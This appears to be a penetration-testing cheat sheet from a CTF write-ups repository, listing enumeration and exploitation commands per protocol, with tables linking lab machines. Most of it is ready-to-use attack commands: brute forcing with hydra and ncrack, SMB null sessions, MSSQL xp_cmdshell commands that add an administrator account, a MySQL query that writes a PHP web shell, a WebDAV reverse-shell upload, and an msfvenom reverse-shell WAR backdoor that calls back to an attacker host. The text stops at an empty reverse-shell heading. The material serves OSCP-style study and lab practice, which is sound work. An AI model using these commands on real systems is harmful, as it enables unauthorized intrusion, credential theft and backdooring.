| 2. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) |
| 3. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) |
| 4. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) |
| 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
---
<a name="enumerate_file_modified_time_window"></a>
#### enumerate_file_modified_time_window [⇡](#enumerate)
find files modified within a time window
```shell
find / -newermt 2020-12-27 ! -newermt 2020-12-30 -type f 2>/def/null
```
[+] https://www.tripwire.com/state-of-security/security-data-protection/passing-offensive-security-certified-professional-exam-oscp/
---
<a name="enumerate_nmap_initial"></a>
#### enumerate_nmap_initial [⇡](#enumerate)
run nmap initial scans
```shell
sudo nmap -Pn -sC -sV -O -oN initial <attackerip>
```
[+] https://medium.com/@ranakhalil101
[+] https://medium.com/@bondo.mike
[+] https://www.jibbsec.com/tags/oscplike/
[+] https://0xdf.gitlab.io/tags.html#oscp-like
---
<a name="enumerate_nmap_tcp"></a>
#### enumerate_nmap_tcp [⇡](#enumerate)
run nmap full tcp scans
```shell
nmap -Pn -sC -sV -p- --min-rate 10000 -oN tcp <attackerip>
```
[+] https://medium.com/@ranakhalil101
[+] https://medium.com/@bondo.mike
[+] https://www.jibbsec.com/tags/oscplike/
[+] https://0xdf.gitlab.io/tags.html#oscp-like
---
<a name="enumerate_nmap_udp"></a>
#### enumerate_nmap_udp [⇡](#enumerate)
run nmap full udp scans
```shell
nmap -Pn -sU -p- -oN udp <attackerip>
```
[+] https://medium.com/@ranakhalil101
[+] https://medium.com/@bondo.mike
[+] https://www.jibbsec.com/tags/oscplike/
[+] https://0xdf.gitlab.io/tags.html#oscp-like
---
<a name="enumerate_proto_distcc"></a>
#### enumerate_proto_distcc [⇡](#enumerate)
```shell
msf: exploit/unix/misc/distcc_exec
```
---
<a name="enumerate_proto_dns"></a>
#### enumerate_proto_dns [⇡](#enumerate)
```shell
reverse lookup to find all hostnames associated with an ip:
dig +noall +answer -x <ipaddress> @<dnsserver>
dns enumeration:
dnsenum -o outputfile -f /usr/share/dnsrecon/namelist.txt -o outputfile domain
bruteforce:
nmap -p 80 --script dns-brute.nse <domain.name>
python dnscan.py -d <domain.name> -w ./subdomains-10000.txt
zone transfer:
dig axfr @<dnsserver> <domain.name>
host -t axfr <domain.name> <dnsserver>
host -l <domain.name> <dnsserver>
```
---
<a name="enumerate_proto_finger"></a>
#### enumerate_proto_finger [⇡](#enumerate)
```shell
finger username@<targetip>
```
---
<a name="enumerate_proto_ftp"></a>
#### enumerate_proto_ftp [⇡](#enumerate)
check if version is vulnerable and exploit is available. check if anonymous access is enabled. check if read permission for sensitive files. check if write permission within webroot/uploads or other critical directories. check if ftp root directory is also http root directory and upload php reverse shell. remember - binary and ascii transfer mode switch
```shell
ftp passive mode:
ftp -p 192.168.92.192
bruteforce ftp login:
use auxiliary/scanner/ftp/ftp_login
misc:
nmap --script=*ftp* --script-args=unsafe=1 -p 20,21 <targetip>
nmap -sV -Pn -vv -p 21 --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 <targetip>
hydra -s 21 -C /usr/share/sparta/wordlists/ftp-default-userpass.txt -u -f <targetip> ftp
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
[+] https://medium.com/@ranakhalil101/my-oscp-journey-a-review-fa779b4339d9
---
<a name="enumerate_proto_http"></a>
#### enumerate_proto_http [⇡](#enumerate)
identify web server, technology, application. identify versions. run nikto, dirb/dirbuster, gobuster scans. look at robots.txt. look at source code. check for default creds, lfi/rfi, sqli, wordpress
```shell
bash /usr/share/sparta/scripts/x11screenshot.sh <targetip>
cewl http://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage
cewl https://<targetip>:<targetport>/ -m 6, "http,https,ssl,soap,http-proxy,http-alt" ## create wordlist by crawling webpage
curl -i <targetip> ## check http response headers
gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500"
gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/cgis.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500"
gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500"
gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u http://<targetip>:<targetport> -s "200,204,301,307,403,500"
gobuster -w /usr/share/wordlists/SecLists/Discovery/Web_Content/common.txt -u https://<targetip>:<targetport> -s "200,204,301,307,403,500"
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://<taregtip>/ -t 20 -U <username> -P <password>
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-get /
hydra -l <username> -P /usr/share/wordlists/rockyou.txt <targetip> http-head /
nc -v -n -w1 <targetip> <targetport> ## netcat to grab banner
nikto -o "[OUTPUT].txt" -p <targetport> -h <targetip>
nmap -Pn -sV -sC -vvvvv -p<targetport> <targetip> -oA [OUTPUT]
w3m -dump <targetip>/robots.txt
wafw00f http://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall
wafw00f https://<targetip>:<targetport>, "http,https,ssl,soap,http-proxy,http-alt" ## check if server is behind a web app firewall
whatweb <targetip>:<targetport> --color=never --log-brief="[OUTPUT].txt" ## identify web technology
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) |
| 2. | [Year of the Fox](https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf) | [tryhackme#yotf](https://tryhackme.com/room/yotf) | <img src="https://github.com/7h3rAm/writeups/blob/master/thm.yotf/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_command_injection`](https://github.com/7h3rAm/writeups#exploit_command_injection), [`privesc_env_relative_path`](https://github.com/7h3rAm/writeups#privesc_env_relative_path) |
| 3. | [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf) | [htb#263](https://app.hackthebox.eu/machines/263) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce), [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof) |
| 4. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) |
| 5. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
---
<a name="enumerate_proto_ldap"></a>
#### enumerate_proto_ldap [⇡](#enumerate)
```shell
ldapsearch -x -s base -h <targetip> -p 389
```
---
<a name="enumerate_proto_mssql"></a>
#### enumerate_proto_mssql [⇡](#enumerate)
```shell
hydra -s <targetport> -C /usr/share/sparta/wordlists/mssql-default-userpass.txt -u -f <targetip> mssql
hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mssql://<targetip>
nmap --script=ms-sql-* --script-args mssql.instance-port=1433 <targetip>
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net user anderson cooper /add"
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <targetip> -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net localgroup administrators anderson /add"
nmap -vv -sV -Pn -p <targetport> --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=%s,smsql.username-sa,mssql.password-sa <targetip>
```
---
<a name="enumerate_proto_mysql"></a>
#### enumerate_proto_mysql [⇡](#enumerate)
```shell
nmap --script=mysql-* <targetip>
bruteforce:
hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt mysql://<targetip>
nmap -p 3306 --script mysql-brute --script-args userdb=/usr/share/wordlists/mysql_users.txt,passdb=/usr/share/wordists/rockyou.txt -vv <targetip>
create a reverse shell:
select '<?php exec($_GET["cmd"]); ?>' from store into dumpfile '/var/www/https/blogblog/wp-content/uploads/shell.php'
udf:
if mysql is running as root AND /usr/lib/lib_mysqludf_sys.so file is present, we can privesc
nmap -sV -Pn -vv -script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <targetip> -p <targetport>
hydra -s <targetport> -C ./wordlists/mysql-default-userpass.txt -u -f <targetip> mysql
```
---
<a name="enumerate_proto_nfs"></a>
#### enumerate_proto_nfs [⇡](#enumerate)
```shell
nmap -sV --script=nfs-* <targetip>
showmount -e <targetip>
```
---
<a name="enumerate_proto_oracle"></a>
#### enumerate_proto_oracle [⇡](#enumerate)
```shell
msfcli auxiliary/scanner/oracle/tnslsnr_version rhosts=<targetip> E
msfcli auxiliary/scanner/oracle/sid_enum rhosts=<targetip> E
tnscmd10g status -h <targetip>
hydra -uf -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 oracle-listener
```
---
<a name="enumerate_proto_postgres"></a>
#### enumerate_proto_postgres [⇡](#enumerate)
```shell
hydra -s <targetport> -C /usr/share/sparta/wordlists/postgres-default-userpass.txt -u -f <targetip> postgres
hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <targetip> -s 1521 postgres
```
---
<a name="enumerate_proto_rdp"></a>
#### enumerate_proto_rdp [⇡](#enumerate)
```shell
perl /usr/share/sparta/scripts/rdp-sec-check.pl <targetip>:<targetport>
ncrack -vv --user administrator -P /usr/share/wordlists/rockyou.txt rdp://<targetip>
```
---
<a name="enumerate_proto_rpc"></a>
#### enumerate_proto_rpc [⇡](#enumerate)
```shell
rpcinfo -p <targetip>
```
---
<a name="enumerate_proto_smb"></a>
#### enumerate_proto_smb [⇡](#enumerate)
```shell
locate all smb scripts on kali and run them to gather details:
locate *.nse | grep smb
try enum4linux to get open shares, permissions and local users:
enum4linux -a <targetip>
nbtscan -vhr <targetip>
scans:
nmap -p139,445 --script smb-vuln-* --script-args=unsafe=1 <targetip>
nmap -p139,445 --script smb-enum-* --script-args=unsafe=1 <targetip>
null sessions: bash -c "echo 'srvinfo' | rpcclient -U % <targetip>"
groups: nmap -vv -p139,445 --script=smb-enum-groups <targetip>
users: bash -c "echo 'enumdomusers' | rpcclient -U % <targetip>"
admins: net rpc group members "Domain Admins" -U % -I <targetip>
shares: nmap -vv -p139,445 --script=smb-enum-shares <targetip>
sessions: nmap -vv -p139,445 --script=smb-enum-sessions <targetip>
policies: nmap -vv -p139,445 --script=smb-enum-domains <targetip>
version: use auxiliary/scanner/smb/smb_version
bruteforce: use auxiliary/scanner/smb/smb_login
bash -c "echo 'enumdomusers' | rpcclient <targetip> -U%"
bash -c "echo 'srvinfo' | rpcclient <targetip> -U%"
bash /usr/share/sparta/scripts/smbenum.sh <targetip>
enum4linux <targetip>
nbtscan -v -h <targetip>
net rpc group members "Domain Admins" -I <targetip> -U%
nmap -p<targetport> --script=smb-enum-domains <targetip> -vvvvv
nmap -p<targetport> --script=smb-enum-groups <targetip> -vvvvv
nmap -p<targetport> --script=smb-enum-sessions <targetip> -vvvvv
nmap -p<targetport> --script=smb-enum-shares <targetip> -vvvvv
nmap -sV -Pn -vv -p <targetport> --script=smb-vuln* --script-args=unsafe=1 <targetip>
python /usr/share/doc/python-impacket-doc/examples/samrdump.py <targetip> <targetport>/SMB
smbclient -L <targetip>
smbclient //<targetip>/admin$ -U john
smbclient //<targetip>/ipc$ -U john
smbclient //<targetip>/tmp
smbclient \\<targetip>\ipc$ -U john
winexe -U username //<targetip> "cmd.exe" --system
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) |
---
<a name="enumerate_proto_smb_anonymous_access"></a>
#### enumerate_proto_smb_anonymous_access [⇡](#enumerate)
open shares, anonymous logins
```shell
# connect to and explore smb share:
smbclient -N -L \\\\<targetip>
smbclient -N \\\\<targetip>\\$share
# look for null sessions "allows sessions using username '', password ''", use smbclient to connect and explore smb share:
enum4linux -a <targetip>
smbclient -U "" //<targetip>/share$ (password: "")
smbclient //<targetip>/share$ -U lazysysadmin -p 445
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) |
---
<a name="enumerate_proto_smtp"></a>
#### enumerate_proto_smtp [⇡](#enumerate)
```shell
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport>
smtp-user-enum -M EXPN -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport>
smtp-user-enum -M RCPT -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t <targetip> -p <targetport>
# send email:
swaks --to eric@madisonhotels.com --from vvaughn@polyfector.edu --server 192.168.92.167:2525 --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"
```
---
<a name="enumerate_proto_snmp"></a>
#### enumerate_proto_snmp [⇡](#enumerate)
```shell
snmpcheck -t <targetip>
nmap -sU -p 161 --script=*snmp* <targetip>
xprobe2 -v -p udp:161:open <targetip>
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
enumerate open ports, running services and applications:
snmpwalk -v2c -c public <targetip> .
snmp-check -t 5 -c public <targetip>
scan using multiple community strings:
echo public >community
echo private >>community
echo manager >>community
for ip in $(seq 200 254); do echo 10.11.1.${ip}; done >ips
onesixtyone -c community -i ips
onesixtyone -c /usr/share/wordlists/dirb/small.txt <targetip>
enumerate windows users:
snmpwalk -c public -v1 <IP> 1.3.6.1.4.1.77.1.2.25
for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt); do snmpwalk -v 1 -c $i 192.168.1.200; done | grep -e "Timeout"
enumerate current windows processes:
snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.4.2.1.2
enumerate windows open tcp ports:
snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.6.13.1.3
enumerate installed software:
snmpwalk -c public -v1 <IP> 1.3.6.1.2.1.25.6.3.1.2
```
---
<a name="enumerate_proto_sql"></a>
#### enumerate_proto_sql [⇡](#enumerate)
```shell
locate all sql scripts on kali and run them to gather details:
locate *.nse | grep sql
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) |
---
<a name="enumerate_proto_sql_ssis_dtsconfig"></a>
#### enumerate_proto_sql_ssis_dtsconfig [⇡](#enumerate)
The `.dtsConfig` files are used by [SQL Server Integration Services (SSIS)](https://en.wikipedia.org/wiki/SQL_Server_Integration_Services) and can contain plaintext credentials for SQL users.
```shell
cat *.dtsConfig
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) |
---
<a name="enumerate_proto_ssh"></a>
#### enumerate_proto_ssh [⇡](#enumerate)
```shell
authorized_keys:
ssh-keygen -t rsa -b 2048
enter a custom filename
copy contents of <filename>.pub to /home/<username>/.ssh/authorized_keys
ssh -i <filename>.pub <username>@<targetip>
ssh enum:
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 10.11.1.0/24
msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/wordlists/metasploit/unix_users.txt
msf auxiliary(scanner/ssh/ssh_enumusers) > set THREADS 254
msf auxiliary(scanner/ssh/ssh_enumusers) > run
```
| # | Name | Infra | Killchain | TTPs |
|---|------|-------|-----------|------|
| 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) |
---
<a name="enumerate_proto_telnet"></a>
#### enumerate_proto_telnet [⇡](#enumerate)
```shell
nmap -p 23 --script telnet-brute --script-args userdb=/usr/share/metasploit-framework/data/wordlists/unix_users,passdb=/usr/share/wordlists/rockyou.txt,telnet-brute.timeout=20s <targetip>
use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > set RHOSTS 10.11.1.0/24
msf auxiliary(telnet_version) > set THREADS 254
msf auxiliary(telnet_version) > run
use auxiliary/scanner/telnet/telnet_login
msf auxiliary(telnet_login) > set BLANK_PASSWORDS false
msf auxiliary(telnet_login) > set PASS_FILE passwords.txt
msf auxiliary(telnet_login) > set RHOSTS 10.11.1.0/24
msf auxiliary(telnet_login) > set THREADS 254
msf auxiliary(telnet_login) > set USER_FILE users.txt
msf auxiliary(telnet_login) > set VERBOSE false
msf auxiliary(telnet_login) > run
```
---
<a name="enumerate_proto_webdav"></a>
#### enumerate_proto_webdav [⇡](#enumerate)
```shell
default pass for xampp: wampp/xampp
test uploading different file extensions:
davtest -url http://10.11.1.10
test uploading different file extensions, with given creds:
davtest -url http://10.11.1.10 -auth username:password
remove files uploaded during test:
davtest -cleanup
create a reverse shell (asp file even if not allowed)
connect to webdav share, bypass upload restrictions:
cadaver http://10.11.1.10
mkdir temp
cd temp
put revshell.asp revshell.txt
copy revshell.txt revshell.asp
open nc to catch reverse shell connection
browse webdav share and open uploaded file
```
---
<a name="exploit"></a>
### ⚙️ Exploit [🡑](#ttps)
<a name="exploit_apache_tomcat"></a>
#### exploit_apache_tomcat [⇡](#exploit)
leverage Tomcat Web Application Manager to deploy a malicious .war file that spawns a reverse shell
```shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> -f war >backdoor.war
# deploy war file through tomcat manager
# start netcat listener and visit the link for uploaded jsp file to trigger webshell
jar -xvf backdoor.war
http://<targetip>:<targetport>/<.war filename w/o extension>/<.jsp filename in war archive w/ extension>
```
[+] https://0xrick.github.io/hack-the-box/jerry/
---
<a name="exploit_bash_reverseshell"></a>
#### exploit_bash_reverseshell [⇡](#exploit)
